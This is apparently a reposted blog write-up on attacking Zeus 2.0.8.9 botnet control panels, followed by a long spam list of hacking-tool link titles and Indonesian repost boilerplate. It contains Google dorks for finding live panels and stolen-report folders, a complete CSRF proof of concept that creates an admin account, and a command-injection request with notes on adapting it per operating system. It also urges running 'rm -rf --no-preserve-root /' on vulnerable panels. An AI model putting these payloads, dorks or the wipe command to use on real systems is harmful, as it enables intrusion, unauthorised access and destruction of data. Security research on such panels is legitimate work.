Attacking Financial Malware Botnet Panels - Zeus

Posted by Informasi Pekerjaan Saturday, June 3, 2023 0 comments
I played with leaked financial malware recently. When I saw these panels are written in PHP, my first idea was to hack them. The results are the work of one evening, please don't expect a full pentest report with all vulns found :-)

The following report is based on Zeus 2.0.8.9, which is old, but I believe a lot of Zeus clones (and C&C panels) depend on this code.

First things first, here are some Google dorks to find Zeus C&C server panel related stuff:
  • inurl:cp.php?m=login - this should be the login to the control panel
  • inurl:_reports/files  - in these folders you can find the stolen stuff, pretty funny if it gets indexed by Google
  • inurl:install/index.php - this should be deleted, but I think this is useless now.


Boring vulns found

Update: You can use the CSRF to create a new user with admin privileges:
<html> <head>     <title></title> </head> <body>     <pre>   This is a CSRF POC to create a new admin user in Zeus admin panels.   Username: user_1392719246 Password: admin1   You might change the URL from 127.0.0.1.   Redirecting in a hidden iframe in <span id="countdown">10</span> seconds.   </pre> <iframe id="csrf-frame" name="csrf-frame" style="display: none;"></iframe>     <form action="http://127.0.0.1/cp.php?m=sys_users&amp;new" id="csrf-form" method="post" name="csrf-form" target="csrf-frame">  <input name="name" type="hidden" value="user_1392719246" />   <input name="password" type="hidden" value="admin1" />   <input name="status" type="hidden" value="1" />   <input name="comment" type="hidden" value="PWND!" />  <input name="r_botnet_bots" type="hidden" value="1" />   <input name="r_botnet_scripts" type="hidden" value="1" />   <input name="r_botnet_scripts_edit" type="hidden" value="1" />   <input name="r_edit_bots" type="hidden" value="1" />   <input name="r_reports_db" type="hidden" value="1" />   <input name="r_reports_db_edit" type="hidden" value="1" />   <input name="r_reports_files" type="hidden" value="1" />  <input name="r_reports_files_edit" type="hidden" value="1" />  <input name="r_reports_jn" type="hidden" value="1" />   <input name="r_stats_main" type="hidden" value="1" />   <input name="r_stats_main_reset" type="hidden" value="1" />   <input name="r_stats_os" type="hidden" value="1" />   <input name="r_system_info" type="hidden" value="1" />   <input name="r_system_options" type="hidden" value="1" />  <input name="r_system_user" type="hidden" value="1" />   <input name="r_system_users" type="hidden" value="1" />     </form> <script type="text/javascript">  window.onload=function(){    var counter = 10;   var interval = setInterval(function() {    counter--;    document.getElementById('countdown').innerHTML = counter;    if (counter == 0) {     redirect();     clearInterval(interval);    }   }, 1000);  };     function redirect() {   document.getElementById("csrf-form").submit();     }     </script> </body> </html> 
  • MD5 password - the passwords stored in MySQL are MD5 passwords. No PBKDF2, bcrypt, scrypt, salt, whatever. MD5.
  • ClickJacking - really boring stuff
  • Remember me (MD5 cookies) - a very bad idea. In this case, the remember me function is implemented in a way where the MD5 of the password and MD5 of the username is stored in a cookie. If I have XSS, I could get the MD5(password) as well.
  • SQLi - although concatenation is used instead of parameterized queries, and addslashes are used, the integers are always quoted. This means it can be hacked only in case of special encoding like GB/Big5, pretty unlikely.

Whats good news (for the C&C panel owners)


The following stuff looks good, at least some vulns were taken seriously:
  • The system directory is protected with .htaccess deny from all.
  • gate.php - this is the "gate" between the bots and the server, this PHP is always exposed to the Internet. The execution of this PHP dies early if you don't know the key. But you can get the key from the binary of this specific botnet (another URL how to do this). If you have the key, then you can fill the database with garbage, but that's all I can think of now.
  • Anti XSS: the following code is used almost everywhere
  • return htmlspecialchars(preg_replace('|[\x00-\x09\x0B\x0C\x0E-\x1F\x7F-\x9F]|u', ' ', $string), ENT_QUOTES, 'UTF-8');
    My evil thought was to inject malicious bot_id, but it looks like it has been filtered everywhere. Sad panda.

What's really bad news (for the C&C panel owners)


And the best vuln I was able to find, remote code execution through command injection (happy panda), but only for authenticated users (sad panda).

The vulnerable code is in system/fsarc.php:

function fsarcCreate($archive, $files){    ...    $archive .= '.zip';    $cli = 'zip -r -9 -q -S "'.$archive.'" "'.implode('" "', $files).'"';    exec($cli, $e, $r); }

The exploit could not be simpler:
POST /cp.php?m=reports_files&path= HTTP/1.1 ... Content-Type: application/x-www-form-urlencoded Content-Length: 60  filesaction=1&files%5B%5D=files"||ping%20-n%2010%20127.0.0.1 
because the zip utility was not found on my Windows box. You can try to replace || with && when attacking Windows (don't forget to URL encode it!), or replace || with ; when attacking Linux. You can also link this vulnerability with the CSRF one, but it is unlikely you know both the control panel admin, and the control panel URLs. Or if this is the case, the admin should practice better OPSEC :)
Recommendation: use escapeshellcmd next time.

Next time you find a vulnerable control panel with a weak password, just rm -rf --no-preserve-root / it ;-)

That's all folks!
Special greetz to Richard (XAMPP Apache service is running as SYSTEM ;-) )

Update: Looks like the gate.php is worth to investigate if you know the RC4 key. You can upload a PHP shell :)
Related links
  1. Hacking Tools Software
  2. Game Hacking
  3. Easy Hack Tools
  4. Best Hacking Tools 2020
  5. Hacker Tool Kit
  6. Computer Hacker
  7. Pentest Box Tools Download
  8. Hacker Tools Hardware
  9. Best Hacking Tools 2019
  10. Hackers Toolbox
  11. Nsa Hack Tools Download
  12. Nsa Hack Tools Download
  13. Hacker Tools 2019
  14. Hack Tools Pc
  15. Hacking Apps
  16. Hack Tools For Ubuntu
  17. Hacker Tool Kit
  18. Hacking Tools Github
  19. Hacking App
  20. What Are Hacking Tools
  21. Hacking Tools For Pc
  22. Hak5 Tools
  23. Hacking Tools Name
  24. Pentest Tools Find Subdomains
  25. Hack Tools For Games
  26. Growth Hacker Tools
  27. Install Pentest Tools Ubuntu
  28. Hack Tools For Mac
  29. Hack Website Online Tool
  30. Hak5 Tools
  31. Growth Hacker Tools
  32. Pentest Tools Download
  33. Blackhat Hacker Tools
  34. Hacker Tools For Windows
  35. Termux Hacking Tools 2019
  36. Hack Tools 2019
  37. Blackhat Hacker Tools
  38. Hack Apps
  39. Pentest Tools Website Vulnerability
  40. Hacker Tools List
  41. Pentest Tools Free
  42. Pentest Tools Linux
  43. Hacker Tools
  44. Pentest Tools Subdomain
  45. Hack Rom Tools
  46. Top Pentest Tools
  47. Pentest Tools Free
  48. Hacking Tools 2019
  49. Hacking Tools For Mac
  50. How To Install Pentest Tools In Ubuntu
  51. Hacking Tools
  52. Tools For Hacker
  53. New Hack Tools
  54. Github Hacking Tools
  55. Hacker Tool Kit
  56. Hacking Tools For Mac
  57. Computer Hacker
  58. Nsa Hacker Tools
  59. Hacker Tools List
  60. Hack Tools For Mac
  61. Hack Tools Github
  62. Hacking Tools Usb
  63. Hacking Tools 2019
  64. Pentest Tools Alternative
  65. Hacks And Tools
  66. Hacker Tools Linux
  67. Hacker
  68. Hackrf Tools
  69. Pentest Tools Website
  70. Hacking Tools Name
  71. Nsa Hack Tools
  72. Hack Tools Mac
  73. Hacker Tools Free Download
  74. Hack And Tools
  75. Beginner Hacker Tools
  76. Hacker Tool Kit
  77. Pentest Tools Tcp Port Scanner
  78. Hacking Tools Download
  79. Hacking App
  80. Beginner Hacker Tools
  81. Hacking Tools For Windows Free Download
  82. Hacking Tools For Windows
  83. Hak5 Tools
  84. Hak5 Tools
  85. Hacker Tools Apk
  86. Beginner Hacker Tools
  87. Hack Tools For Pc
  88. Pentest Tools For Android
  89. Easy Hack Tools
  90. Game Hacking
  91. Hacking App
  92. Pentest Tools Download
  93. Best Hacking Tools 2020
  94. Pentest Tools Website
  95. Hacker Tools For Windows
  96. Hacker Tools Apk
  97. Hacker Tools For Windows
  98. Hack Rom Tools
  99. Termux Hacking Tools 2019
  100. Github Hacking Tools
  101. Hacking Tools Name
  102. What Are Hacking Tools
  103. Easy Hack Tools
  104. Hack Tools 2019
  105. Pentest Tools For Mac
  106. Pentest Tools Subdomain
  107. Hacker Security Tools
  108. Pentest Tools Port Scanner
  109. Hak5 Tools
  110. Best Pentesting Tools 2018
  111. Underground Hacker Sites
  112. Hacker Tools 2019
  113. Pentest Tools List
  114. Hack Rom Tools
  115. Pentest Tools Kali Linux
  116. Hack Tools For Games
  117. Hacking Tools Pc
  118. Hacker Tools Free
  119. Hack Website Online Tool
  120. Pentest Tools Website
  121. Hacking Tools For Windows 7
  122. Hacker Hardware Tools
  123. Pentest Tools For Windows
  124. New Hacker Tools
  125. Pentest Tools Website Vulnerability
  126. Pentest Tools Windows
  127. New Hacker Tools
  128. Hacking Tools 2020
  129. Hack Tools For Windows
  130. Pentest Tools Online
  131. World No 1 Hacker Software
  132. Black Hat Hacker Tools
  133. Pentest Tools Free
  134. Kik Hack Tools
  135. Hacking Tools Online
  136. Free Pentest Tools For Windows
  137. Hack App
  138. Hack Tools Github
  139. Hacker Tools Software
  140. Best Pentesting Tools 2018
  141. Pentest Reporting Tools
  142. Hacking Tools Pc
  143. Hacking Tools For Mac
  144. Hacking Tools For Pc
  145. Hacking Tools For Beginners
  146. Pentest Tools Kali Linux
  147. Hack Tools Github
  148. Termux Hacking Tools 2019
  149. Pentest Tools For Windows
  150. Pentest Tools Website
  151. Hack Tool Apk No Root
  152. Hack Tools Mac


Anda sedang membaca artikel tentang Attacking Financial Malware Botnet Panels - Zeus dan anda bisa menemukan artikel Attacking Financial Malware Botnet Panels - Zeus ini dengan url http://hobi-kesenangan.blogspot.com/2023/06/attacking-financial-malware-botnet.html,anda boleh menyebar luaskannya atau mengcopy paste-nya jika artikel Attacking Financial Malware Botnet Panels - Zeus ini sangat bermanfaat bagi teman-teman anda,namun jangan lupa untuk meletakkan link Attacking Financial Malware Botnet Panels - Zeus sebagai sumbernya.

Silahkan sobat tinggalkan komentar jika dirasa ada informasi yang sobat butuhkan

0 comments:

Post a Comment

vivanews.com

nines cantik